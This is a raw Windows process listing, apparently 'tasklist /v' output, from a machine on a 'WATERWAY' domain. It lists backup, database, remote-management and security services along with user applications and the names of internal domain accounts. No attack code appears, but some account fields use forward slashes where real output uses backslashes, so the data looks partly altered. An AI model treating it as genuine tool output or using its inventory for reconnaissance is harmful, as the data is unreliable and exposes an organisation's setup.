svchost.exe 1448 Services 0 48,528 K Unknown NT AUTHORITY\SYSTEM 0:18:52 N/A
fontdrvhost.exe 1476 Services 0 1,960 K Unknown Font Driver Host\UMFD-0 0:00:17 N/A
WUDFHost.exe 1540 Services 0 3,672 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:01 N/A
svchost.exe 1580 Services 0 25,648 K Unknown NT AUTHORITY/NETWORK SERVICE 0:18:06 N/A
svchost.exe 1672 Services 0 7,448 K Unknown NT AUTHORITY\SYSTEM 0:02:10 N/A
svchost.exe 1928 Services 0 14,368 K Unknown NT AUTHORITY/NETWORK SERVICE 0:37:14 N/A
svchost.exe 1964 Services 0 5,024 K Unknown NT AUTHORITY\LOCAL SERVICE 0:01:46 N/A
svchost.exe 1972 Services 0 4,984 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:02 N/A
svchost.exe 1984 Services 0 4,800 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:08 N/A
svchost.exe 1992 Services 0 11,448 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:29 N/A
svchost.exe 2016 Services 0 4,908 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:03 N/A
svchost.exe 2024 Services 0 4,976 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:04 N/A
svchost.exe 796 Services 0 3,372 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
svchost.exe 2092 Services 0 5,964 K Unknown NT AUTHORITY/LOCAL SERVICE 0:01:41 N/A
svchost.exe 2140 Services 0 6,812 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
svchost.exe 2148 Services 0 6,972 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:09 N/A
svchost.exe 2156 Services 0 8,616 K Unknown NT AUTHORITY/NETWORK SERVICE 0:16:36 N/A
svchost.exe 2288 Services 0 58,236 K Unknown NT AUTHORITY\LOCAL SERVICE 0:04:33 N/A
svchost.exe 2380 Services 0 3,564 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
svchost.exe 2520 Services 0 39,696 K Unknown NT AUTHORITY/LOCAL SERVICE 0:01:48 N/A
svchost.exe 2640 Services 0 11,220 K Unknown NT AUTHORITY/NETWORK SERVICE 0:01:25 N/A
svchost.exe 2668 Services 0 8,840 K Unknown NT AUTHORITY\SYSTEM 0:00:04 N/A
svchost.exe 2856 Services 0 9,548 K Unknown NT AUTHORITY\LOCAL SERVICE 0:02:47 N/A
NVDisplay.Container.exe 2876 Services 0 7,592 K Unknown NT AUTHORITY\SYSTEM 0:00:05 N/A
svchost.exe 2932 Services 0 12,412 K Unknown NT AUTHORITY\SYSTEM 0:01:10 N/A
svchost.exe 2952 Services 0 7,604 K Unknown NT AUTHORITY\SYSTEM 0:00:31 N/A
svchost.exe 3032 Services 0 6,944 K Unknown NT AUTHORITY\SYSTEM 0:00:14 N/A
svchost.exe 3068 Services 0 8,116 K Unknown NT AUTHORITY\SYSTEM 0:35:17 N/A
svchost.exe 2208 Services 0 5,476 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:03 N/A
svchost.exe 2076 Services 0 3,752 K Unknown NT AUTHORITY\SYSTEM 0:00:04 N/A
svchost.exe 3188 Services 0 5,924 K Unknown NT AUTHORITY\SYSTEM 0:00:05 N/A
Memory Compression 3220 Services 0 913,128 K Unknown NT AUTHORITY\SYSTEM 4:11:03 N/A
svchost.exe 3260 Services 0 6,420 K Unknown NT AUTHORITY\SYSTEM 0:00:15 N/A
dasHost.exe 3288 Services 0 13,892 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:07 N/A
svchost.exe 3320 Services 0 27,668 K Unknown NT AUTHORITY\SYSTEM 1:18:04 N/A
svchost.exe 3328 Services 0 5,784 K Unknown NT AUTHORITY\SYSTEM 0:02:09 N/A
svchost.exe 3336 Services 0 8,928 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:14 N/A
svchost.exe 3412 Services 0 6,660 K Unknown NT AUTHORITY\LOCAL SERVICE 0:01:21 N/A
svchost.exe 3632 Services 0 4,808 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
svchost.exe 3660 Services 0 7,512 K Unknown NT AUTHORITY\SYSTEM 0:00:28 N/A
svchost.exe 3688 Services 0 9,432 K Unknown NT AUTHORITY\SYSTEM 0:00:08 N/A
svchost.exe 3816 Services 0 17,668 K Unknown NT AUTHORITY\SYSTEM 0:05:11 N/A
svchost.exe 3868 Services 0 14,044 K Unknown NT AUTHORITY\SYSTEM 0:00:20 N/A
svchost.exe 4040 Services 0 5,172 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
svchost.exe 3400 Services 0 4,964 K Unknown NT AUTHORITY/NETWORK SERVICE 0:00:11 N/A
svchost.exe 4112 Services 0 5,604 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
svchost.exe 4392 Services 0 11,808 K Unknown NT AUTHORITY\LOCAL SERVICE 0:04:22 N/A
svchost.exe 4508 Services 0 6,556 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:04 N/A
svchost.exe 4516 Services 0 4,268 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:05 N/A
svchost.exe 4560 Services 0 4,440 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
svchost.exe 4664 Services 0 6,656 K Unknown NT AUTHORITY\SYSTEM 0:00:57 N/A
svchost.exe 4712 Services 0 5,716 K Unknown NT AUTHORITY/NETWORK SERVICE 0:00:06 N/A
spoolsv.exe 4796 Services 0 29,976 K Unknown NT AUTHORITY\SYSTEM 0:02:06 N/A
svchost.exe 5568 Services 0 4,864 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
svchost.exe 5584 Services 0 11,352 K Unknown NT AUTHORITY/NETWORK SERVICE 0:01:01 N/A
svchost.exe 5592 Services 0 30,584 K Unknown NT AUTHORITY\SYSTEM 0:05:15 N/A
svchost.exe 5600 Services 0 4,160 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:04 N/A
BASupSrvcUpdater.exe 5608 Services 0 11,564 K Unknown NT AUTHORITY\SYSTEM 0:06:10 N/A
BASupSrvc.exe 5616 Services 0 24,980 K Unknown NT AUTHORITY\SYSTEM 0:18:30 N/A
svchost.exe 5560 Services 0 3,372 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
bdredline.exe 5628 Services 0 7,808 K Unknown NT AUTHORITY\SYSTEM 0:00:05 N/A
BtwRSupportService.exe 5636 Services 0 4,160 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
svchost.exe 5644 Services 0 5,040 K Unknown NT AUTHORITY\SYSTEM 0:00:03 N/A
EPIntegrationService.exe 5660 Services 0 13,624 K Unknown NT AUTHORITY\SYSTEM 0:06:34 N/A
EPUpdateService.exe 5668 Services 0 9,536 K Unknown NT AUTHORITY\SYSTEM 0:03:42 N/A
3CXWMRemoteControlSvc.exe 5676 Services 0 3,492 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
armsvc.exe 5688 Services 0 4,076 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
EPProtectedService.exe 5696 Services 0 6,148 K Unknown NT AUTHORITY\SYSTEM 0:01:18 N/A
svchost.exe 5716 Services 0 46,712 K Unknown NT AUTHORITY\LOCAL SERVICE 0:16:32 N/A
AGSService.exe 5724 Services 0 6,508 K Unknown NT AUTHORITY\SYSTEM 0:00:04 N/A
AGMService.exe 5736 Services 0 7,496 K Unknown NT AUTHORITY\SYSTEM 0:00:08 N/A
AdobeUpdateService.exe 5760 Services 0 4,300 K Unknown NT AUTHORITY\SYSTEM 0:00:05 N/A
EPSecurityService.exe 5784 Services 0 206,880 K Unknown NT AUTHORITY\SYSTEM 4:22:41 N/A
MTSCRA.WEBAPI.HostService 5800 Services 0 4,284 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
svchost.exe 5836 Services 0 5,964 K Unknown NT AUTHORITY\SYSTEM 0:09:33 N/A
sqlservr.exe 6000 Services 0 265,128 K Unknown NT AUTHORITY\SYSTEM 6:41:36 N/A
svchost.exe 6036 Services 0 3,308 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:02 N/A
svchost.exe 6064 Services 0 3,356 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:01 N/A
svchost.exe 6124 Services 0 3,220 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:01 N/A
RedGate.Client.Service.ex 6236 Services 0 16,064 K Unknown NT AUTHORITY\SYSTEM 0:00:23 N/A
RtkAudUService64.exe 6244 Services 0 5,260 K Unknown NT AUTHORITY\SYSTEM 0:00:14 N/A
svchost.exe 6256 Services 0 3,404 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
sqlbrowser.exe 6264 Services 0 1,864 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:02 N/A
svchost.exe 6272 Services 0 7,764 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:13 N/A
sqlwriter.exe 6280 Services 0 4,248 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
mysqld.exe 6316 Services 0 4,372 K Unknown NT AUTHORITY/NETWORK SERVICE 0:00:01 N/A
vss-service-x64.exe 6448 Services 0 3,920 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
svchost.exe 6528 Services 0 6,996 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
svchost.exe 6540 Services 0 16,048 K Unknown NT AUTHORITY\SYSTEM 0:00:27 N/A
vmms.exe 6548 Services 0 14,092 K Unknown NT AUTHORITY\SYSTEM 0:00:18 N/A
VeeamFilesysVssSvc.exe 6608 Services 0 7,660 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
svchost.exe 6616 Services 0 3,348 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:01 N/A
agent.exe 6632 Services 0 422,776 K Unknown NT AUTHORITY\SYSTEM 0:30:15 N/A
Veeam.Backup.Agent.Config 6648 Services 0 13,388 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
wgsslvpnsrc.exe 6664 Services 0 2,472 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
VeeamHvIntegrationSvc.exe 6700 Services 0 6,912 K Unknown NT AUTHORITY\SYSTEM 0:21:15 N/A
VeeamTransportSvc.exe 6744 Services 0 4,232 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
svchost.exe 6772 Services 0 4,932 K Unknown NT AUTHORITY/NETWORK SERVICE 0:00:14 N/A
VeeamDeploymentSvc.exe 6780 Services 0 7,888 K Unknown NT AUTHORITY\SYSTEM 0:00:05 N/A
VeeamNFSSvc.exe 6800 Services 0 2,916 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
CptService.exe 6900 Services 0 2,648 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
svchost.exe 7380 Services 0 8,080 K Unknown NT AUTHORITY\SYSTEM 0:00:14 N/A
sqlceip.exe 7728 Services 0 42,668 K Unknown NT SERVICE\SQLTELEMETRY$VEEAMSQL2016 0:00:57 N/A
sqlservr.exe 7744 Services 0 129,812 K Unknown NT SERVICE\MSSQL$MSSQLSERVER01 11:15:43 N/A
sqlceip.exe 7752 Services 0 25,080 K Unknown NT SERVICE\SQLTELEMETRY$MSSQLSERVER01 0:00:36 N/A
WmiPrvSE.exe 8048 Services 0 74,680 K Unknown NT AUTHORITY\SYSTEM 1:16:17 N/A
Veeam.Guest.Interaction.P 8224 Services 0 2,684 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
conhost.exe 8296 Services 0 3,216 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
mysqld.exe 8432 Services 0 22,736 K Unknown NT AUTHORITY/NETWORK SERVICE 0:00:04 N/A
conhost.exe 8496 Services 0 3,296 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:00 N/A
unsecapp.exe 8740 Services 0 4,644 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
dasHost.exe 8776 Services 0 5,012 K Unknown NT AUTHORITY/NETWORK SERVICE 0:00:00 N/A
MsDtsSrvr.exe 8300 Services 0 5,424 K Unknown NT SERVICE\MsDtsServer150 0:00:02 N/A
sqlceip.exe 8928 Services 0 15,660 K Unknown NT SERVICE\SSISTELEMETRY150 0:00:56 N/A
sqlceip.exe 9352 Services 0 21,304 K Unknown NT SERVICE\SQLTELEMETRY 0:01:21 N/A
svchost.exe 10072 Services 0 14,716 K Unknown NT AUTHORITY\SYSTEM 0:00:11 N/A
svchost.exe 10156 Services 0 5,272 K Unknown NT AUTHORITY\LOCAL SERVICE 0:01:47 N/A
svchost.exe 10224 Services 0 4,792 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:01 N/A
vmcompute.exe 9444 Services 0 3,676 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
vds.exe 9520 Services 0 4,772 K Unknown NT AUTHORITY\SYSTEM 0:00:22 N/A
svchost.exe 10676 Services 0 8,248 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
svchost.exe 10740 Services 0 5,244 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
NableSixtyFourBitManager.    11976 Services 0 37,732 K Unknown NT AUTHORITY\SYSTEM 1:09:12 N/A
conhost.exe 11996 Services 0 3,240 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
NableReactiveManagement.e 12032 Services 0 13,264 K Unknown NT AUTHORITY\SYSTEM 0:00:14 N/A
conhost.exe 12060 Services 0 3,240 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 12252 Services 0 11,924 K Unknown NT AUTHORITY\SYSTEM 0:00:18 N/A
svchost.exe 12472 Services 0 12,176 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:07 N/A
svchost.exe 13004 Services 0 8,556 K Unknown NT AUTHORITY\SYSTEM 0:00:03 N/A
WmiApSrv.exe 13836 Services 0 5,316 K Unknown NT AUTHORITY\SYSTEM 1:00:29 N/A
WmiPrvSE.exe 14268 Services 0 10,128 K Unknown NT AUTHORITY\LOCAL SERVICE 0:12:20 N/A
dllhost.exe 14084 Services 0 5,548 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
SolarWinds.MSP.CacheServi 15348 Services 0 18,160 K Unknown NT AUTHORITY\LOCAL SERVICE 0:01:27 N/A
SolarWinds.MSP.RpcServerS 15004 Services 0 17,172 K Unknown NT AUTHORITY\SYSTEM 0:00:44 N/A
svchost.exe 15148 Services 0 8,064 K Unknown NT AUTHORITY\SYSTEM 0:02:13 N/A
SecurityHealthService.exe 15288 Services 0 10,516 K Unknown NT AUTHORITY\SYSTEM 0:00:04 N/A
svchost.exe 15108 Services 0 4,684 K Unknown NT AUTHORITY\SYSTEM 0:00:12 N/A
ALEService.exe 9816 Services 0 407,844 K Unknown WATERWAY\blauer 70:01:27 N/A
SgrmBroker.exe 9408 Services 0 7,196 K Unknown NT AUTHORITY\SYSTEM 0:01:49 N/A
SolarWinds.MSP.PME.Agent.     5876 Services 0 6,548 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
Veeam.Backup.Service.exe 2396 Services 0 247,100 K Unknown NT AUTHORITY\SYSTEM 2:05:26 N/A
svchost.exe 6092 Services 0 15,396 K Unknown NT AUTHORITY\SYSTEM 0:02:16 N/A
svchost.exe 12000 Services 0 7,088 K Unknown NT AUTHORITY\SYSTEM 0:00:11 N/A
svchost.exe 5860 Services 0 7,572 K Unknown NT AUTHORITY\SYSTEM 0:00:21 N/A
svchost.exe 12188 Services 0 7,908 K Unknown NT AUTHORITY\SYSTEM 0:00:30 N/A
svchost.exe 15924 Services 0 12,608 K Unknown NT AUTHORITY\SYSTEM 0:00:17 N/A
svchost.exe 16128 Services 0 13,992 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:19 N/A
Veeam.Backup.BrokerServic 18892 Services 0 13,724 K Unknown NT AUTHORITY\SYSTEM 0:00:12 N/A
Veeam.Backup.UIServer.exe 18900 Services 0 33,232 K Unknown NT AUTHORITY\SYSTEM 0:37:33 N/A
Veeam.Backup.ExternalInfr 18936 Services 0 23,292 K Unknown NT AUTHORITY\SYSTEM 0:02:09 N/A
conhost.exe 18964 Services 0 3,848 K Unknown NT AUTHORITY\SYSTEM 0:00:07 N/A
Veeam.Backup.WmiServer.ex 19264 Services 0 19,032 K Unknown NT AUTHORITY\SYSTEM 0:00:41 N/A
conhost.exe 19168 Services 0 3,984 K Unknown NT AUTHORITY\SYSTEM 0:00:03 N/A
Veeam.Backup.CatalogDataS 19564 Services 0 19,716 K Unknown NT AUTHORITY\SYSTEM 0:00:23 N/A
Veeam.Backup.CloudService 20072 Services 0 44,108 K Unknown NT AUTHORITY\SYSTEM 0:03:00 N/A
Veeam.Backup.EnterpriseSe 20940 Services 0 33,344 K Unknown NT AUTHORITY\SYSTEM 0:04:29 N/A
Veeam.Backup.Enterprise.W 23216 Services 0 11,676 K Unknown NT AUTHORITY\SYSTEM 0:00:22 N/A
conhost.exe 23240 Services 0 3,868 K Unknown NT AUTHORITY\SYSTEM 0:00:03 N/A
Veeam.Backup.MountService 23360 Services 0 14,324 K Unknown NT AUTHORITY\SYSTEM 0:00:03 N/A
Veeam.Backup.Enterprise.R 23568 Services 0 26,500 K Unknown NT AUTHORITY\SYSTEM 0:00:24 N/A
AgentMaint.exe 24564 Services 0 12,792 K Unknown NT AUTHORITY\SYSTEM 0:00:08 N/A
svchost.exe 23004 Services 0 7,400 K Unknown NT AUTHORITY\SYSTEM 0:00:03 N/A
svchost.exe 15204 Services 0 6,776 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:02 N/A
svchost.exe 24776 Services 0 4,812 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
svchost.exe 28960 Services 0 5,196 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
NableAVDBridge.exe 28952 Services 0 22,096 K Unknown NT AUTHORITY\SYSTEM 0:00:29 N/A
conhost.exe 21064 Services 0 4,148 K Unknown NT AUTHORITY\SYSTEM 0:00:06 N/A
svchost.exe 27260 Services 0 10,112 K Unknown NT AUTHORITY\SYSTEM 0:00:05 N/A
svchost.exe 14916 Services 0 5,636 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:03 N/A
svchost.exe 36520 Services 0 5,004 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:08 N/A
WmiPrvSE.exe 39552 Services 0 65,268 K Unknown NT AUTHORITY\SYSTEM 0:35:33 N/A
WmiPrvSE.exe 29268 Services 0 8,568 K Unknown NT AUTHORITY\LOCAL SERVICE 0:01:17 N/A
dasHost.exe 10892 Services 0 3,064 K Unknown NT AUTHORITY/NETWORK SERVICE 0:00:00 N/A
svchost.exe 11904 Services 0 5,344 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:01 N/A
svchost.exe 15692 Services 0 7,080 K Unknown NT AUTHORITY\SYSTEM 0:00:06 N/A
svchost.exe 42980 Services 0 6,336 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:01 N/A
MAGNEFLEX.Host.Service.ex 39396 Services 0 4,424 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
OfficeClickToRun.exe 14996 Services 0 28,220 K Unknown NT AUTHORITY\SYSTEM 0:00:29 N/A
AppVShNotify.exe 38144 Services 0 4,184 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
SearchIndexer.exe 5856 Services 0 69,812 K Unknown NT AUTHORITY\SYSTEM 0:15:01 N/A
Agent.exe 19932 Services 0 8,836 K Unknown NT AUTHORITY\SYSTEM 0:20:34 N/A
csrss.exe 12116 Console 4 16,048 K Unknown NT AUTHORITY\SYSTEM 0:09:33 N/A
winlogon.exe 10220 Console 4 11,836 K Unknown NT AUTHORITY\SYSTEM 0:00:49 N/A
fontdrvhost.exe 32204 Console 4 12,192 K Unknown Font Driver Host\UMFD-4 0:00:33 N/A
dwm.exe 34156 Console 4 467,000 K Unknown Window Manager\DWM-4 1:41:19 N/A
EPConsole.exe 29256 Console 4 1,304 K Unknown WATERWAY\blauer 0:03:53 N/A
sihost.exe 17500 Console 4 27,328 K Unknown WATERWAY\blauer 0:01:51 N/A
svchost.exe 15560 Console 4 23,812 K Unknown WATERWAY\blauer 0:01:16 N/A
ipoint.exe 6732 Console 4 4,912 K Unknown WATERWAY\blauer 0:23:38 N/A
taskhostw.exe 9512 Console 4 19,988 K Unknown WATERWAY\blauer 0:00:25 N/A
itype.exe 24536 Console 4 436 K Unknown WATERWAY\blauer 0:03:43 N/A
MKCHelper.exe 10024 Console 4 1,292 K Unknown WATERWAY\blauer 0:00:00 N/A
explorer.exe 17792 Console 4 160,260 K Unknown WATERWAY\blauer 0:32:58 N/A
StartMenuExperienceHost.e 40684 Console 4 39,980 K Unknown WATERWAY\blauer 0:00:17 N/A
RuntimeBroker.exe 4344 Console 4 16,316 K Unknown WATERWAY\blauer 0:00:08 N/A
SearchUI.exe 20344 Console 4 69,704 K Unknown WATERWAY\blauer 0:01:54 N/A
RuntimeBroker.exe 38364 Console 4 37,628 K Unknown WATERWAY\blauer 0:01:00 N/A
dllhost.exe 21704 Console 4 9,400 K Unknown WATERWAY\blauer 0:00:02 N/A
TodoBackupService.exe 16464 Console 4 5,648 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
RuntimeBroker.exe 14764 Console 4 22,320 K Unknown WATERWAY\blauer 0:02:08 N/A
ApplicationFrameHost.exe 4496 Console 4 31,404 K Unknown WATERWAY\blauer 0:00:17 N/A
SecurityHealthSystray.exe 23016 Console 4 7,248 K Unknown WATERWAY\blauer 0:00:00 N/A
RtkAudUService64.exe 2944 Console 4 6,488 K Unknown WATERWAY\blauer 0:00:00 N/A
LogiOptions.exe 26908 Console 4 8,100 K Unknown WATERWAY\blauer 0:04:15 N/A
LogiOptionsMgr.exe 25572 Console 4 22,132 K Unknown WATERWAY\blauer 0:00:29 N/A
LogiOverlay.exe 41436 Console 4 38,956 K Unknown WATERWAY\blauer 0:03:44 N/A
OneDrive.exe 16416 Console 4 39,248 K Unknown WATERWAY\blauer 0:01:35 N/A
CCXProcess.exe 36108 Console 4 1,844 K Unknown WATERWAY\blauer 0:00:00 N/A
node.exe 26644 Console 4 57,200 K Unknown WATERWAY\blauer 0:30:33 N/A
conhost.exe 23400 Console 4 3,580 K Unknown WATERWAY\blauer 0:00:00 N/A
AdobeIPCBroker.exe 12072 Console 4 11,780 K Unknown WATERWAY\blauer 0:28:27 N/A
chrome.exe 31592 Console 4 295,264 K Unknown WATERWAY\blauer 1:50:34 N/A
chrome.exe 15200 Console 4 4,880 K Unknown WATERWAY\blauer 0:00:02 N/A
chrome.exe 15472 Console 4 285,180 K Unknown WATERWAY\blauer 0:36:05 N/A
chrome.exe 34372 Console 4 73,292 K Unknown WATERWAY\blauer 0:27:11 N/A
chrome.exe 27544 Console 4 11,916 K Unknown WATERWAY\blauer 0:05:17 N/A
chrome.exe 27724 Console 4 51,816 K Unknown WATERWAY\blauer 0:02:59 N/A
chrome.exe 22768 Console 4 57,248 K Unknown WATERWAY\blauer 0:00:39 N/A
chrome.exe 28912 Console 4 188,200 K Unknown WATERWAY\blauer 0:05:32 N/A
chrome.exe 23328 Console 4 20,800 K Unknown WATERWAY\blauer 0:00:10 N/A
chrome.exe 4036 Console 4 9,044 K Unknown WATERWAY\blauer 0:00:16 N/A
AppleMobileDeviceProcess.    41884 Console 4 7,832 K Unknown WATERWAY\blauer 0:03:21 N/A
3CXWin8Phone.exe 27692 Console 4 123,900 K Unknown WATERWAY\blauer 0:56:56 N/A
BASupSrvcCnfg.exe 7556 Console 4 12,876 K Unknown WATERWAY\blauer 0:32:23 N/A
acrotray.exe 16828 Console 4 4,468 K Unknown WATERWAY\blauer 0:00:01 N/A
Creative Cloud.exe 24288 Console 4 55,500 K Unknown WATERWAY\blauer 0:19:36 N/A
Adobe CEF Helper.exe 32184 Console 4 22,696 K Unknown WATERWAY\blauer 0:12:52 N/A
Adobe Desktop Service.exe 40852 Console 4 81,052 K Unknown WATERWAY\blauer 0:34:04 N/A
Adobe CEF Helper.exe 2428 Console 4 158,868 K Unknown WATERWAY\blauer 1:05:01 N/A
Creative Cloud Helper.exe 22332 Console 4 19,640 K Unknown WATERWAY\blauer 0:13:17 N/A
CCLibrary.exe 18324 Console 4 1,856 K Unknown WATERWAY\blauer 0:00:00 N/A
node.exe 35104 Console 4 36,032 K Unknown WATERWAY\blauer 0:14:20 N/A
conhost.exe 4460 Console 4 3,584 K Unknown WATERWAY\blauer 0:00:00 N/A
CoreSync.exe 16208 Console 4 28,528 K Unknown WATERWAY\blauer 0:36:28 N/A
ONENOTEM.EXE 37636 Console 4 1,900 K Unknown WATERWAY\blauer 0:00:00 N/A
AdobeNotificationClient.e 27620 Console 4 1,012 K Unknown WATERWAY\blauer 0:00:00 N/A
Adobe Installer.exe 31268 Console 4 5,620 K Unknown WATERWAY\blauer 0:00:00 N/A
Adobe CEF Helper.exe 28724 Console 4 26,872 K Unknown WATERWAY\blauer 0:12:56 N/A
RuntimeBroker.exe 25900 Console 4 9,472 K Unknown WATERWAY\blauer 0:00:00 N/A
ShellExperienceHost.exe 23944 Console 4 56,372 K Unknown WATERWAY\blauer 0:00:26 N/A
RuntimeBroker.exe 32588 Console 4 27,900 K Unknown WATERWAY\blauer 0:00:08 N/A
svchost.exe 9332 Console 4 18,424 K Unknown WATERWAY\blauer 0:00:19 N/A
YourPhoneServer.exe 31332 Console 4 22,240 K Unknown WATERWAY\blauer 0:00:22 N/A
SettingSyncHost.exe 39092 Console 4 10,788 K Unknown WATERWAY\blauer 0:00:01 N/A
WindowsInternal.composabl 15372 Console 4 17,568 K Unknown WATERWAY\blauer 0:00:23 N/A
Slack.exe 31904 Console 4 85,668 K Unknown WATERWAY\blauer 0:10:31 N/A
Slack.exe 41664 Console 4 100,124 K Unknown WATERWAY\blauer 0:03:43 N/A
Slack.exe 34496 Console 4 19,596 K Unknown WATERWAY\blauer 0:01:03 N/A
RuntimeBroker.exe 22304 Console 4 5,232 K Unknown WATERWAY\blauer 0:00:00 N/A
Slack.exe 10944 Console 4 8,624 K Unknown WATERWAY\blauer 0:00:01 N/A
Slack.exe 21904 Console 4 166,092 K Unknown WATERWAY\blauer 0:33:21 N/A
dllhost.exe 31708 Console 4 10,072 K Unknown WATERWAY\blauer 0:00:02 N/A
Slack.exe 23036 Console 4 47,640 K Unknown WATERWAY\blauer 0:02:37 N/A
Slack.exe 15912 Console 4 9,676 K Unknown WATERWAY\blauer 0:00:16 N/A
Video.UI.exe 32480 Console 4 524 K Unknown WATERWAY\blauer 0:00:00 N/A
RuntimeBroker.exe 7700 Console 4 6,620 K Unknown WATERWAY\blauer 0:00:00 N/A
svchost.exe 36648 Console 4 25,584 K Unknown WATERWAY\blauer 0:00:38 N/A
regsvr32.exe 19536 Services 0 12,424 K Unknown WATERWAY\mharper 0:00:22 N/A
Calculator.exe 3432 Console 4 4,500 K Unknown WATERWAY\blauer 0:00:21 N/A
adb.exe 12956 Console 4 5,676 K Unknown WATERWAY\blauer 0:00:07 N/A
smartscreen.exe 27256 Console 4 24,068 K Unknown WATERWAY\blauer 0:00:11 N/A
svchost.exe 44376 Console 4 6,056 K Unknown WATERWAY\blauer 0:00:00 N/A
NCentralRDViewer.exe 43768 Console 4 108 K Unknown WATERWAY\blauer 0:00:00 N/A
SpeechRuntime.exe 27836 Console 4 14,848 K Unknown WATERWAY\blauer 0:00:06 N/A
HelpPane.exe 29828 Console 4 9,456 K Unknown WATERWAY\blauer 0:00:01 N/A
CompPkgSrv.exe 45776 Console 4 4,968 K Unknown WATERWAY\blauer 0:00:00 N/A
Microsoft.Photos.exe 4336 Console 4 7,392 K Unknown WATERWAY\blauer 0:00:56 N/A
RuntimeBroker.exe 40692 Console 4 28,292 K Unknown WATERWAY\blauer 0:01:30 N/A
Adobe CEF Helper.exe 30716 Console 4 12,624 K Unknown WATERWAY\blauer 0:08:06 N/A
NCentralRDLdr.exe 23292 Console 4 10,436 K Unknown WATERWAY\blauer 0:00:00 N/A
NCentralRRDViewer.exe 22220 Console 4 22,680 K Unknown WATERWAY\blauer 0:00:15 N/A
Todo.exe 20876 Console 4 133,788 K Unknown WATERWAY\blauer 0:01:01 N/A
RuntimeBroker.exe 15216 Console 4 32,128 K Unknown WATERWAY\blauer 0:00:24 N/A
WmiPrvSE.exe 34888 Services 0 34,408 K Unknown NT AUTHORITY\NETWORK SERVICE 0:13:11 N/A
Ssms.exe 44328 Console 4 227,644 K Unknown WATERWAY\blauer 0:18:10 N/A
unsecapp.exe 30292 Console 4 13,208 K Unknown WATERWAY\blauer 0:01:29 N/A
FileCoAuth.exe 20264 Console 4 12,528 K Unknown WATERWAY\blauer 0:00:02 N/A
OUTLOOK.EXE 23344 Console 4 460,596 K Unknown WATERWAY\blauer 0:24:22 N/A
sppsvc.exe 40540 Services 0 11,892 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:17 N/A
ctfmon.exe 47224 Console 4 19,856 K Unknown WATERWAY\blauer 0:00:51 N/A
PeopleExperienceHost.exe 7072 Console 4 39,376 K Unknown WATERWAY\blauer 0:00:00 N/A
RuntimeBroker.exe 41112 Console 4 9,312 K Unknown WATERWAY\blauer 0:00:00 N/A
SystemSettingsBroker.exe 36768 Console 4 21,924 K Unknown WATERWAY\blauer 0:00:00 N/A
SystemSettings.exe 16544 Console 4 64,608 K Unknown WATERWAY\blauer 0:00:06 N/A
WinSCP.exe 34652 Console 4 39,512 K Unknown WATERWAY\blauer 0:01:14 N/A
Ssms.exe 50816 Console 4 169,672 K Unknown WATERWAY\blauer 0:00:57 N/A
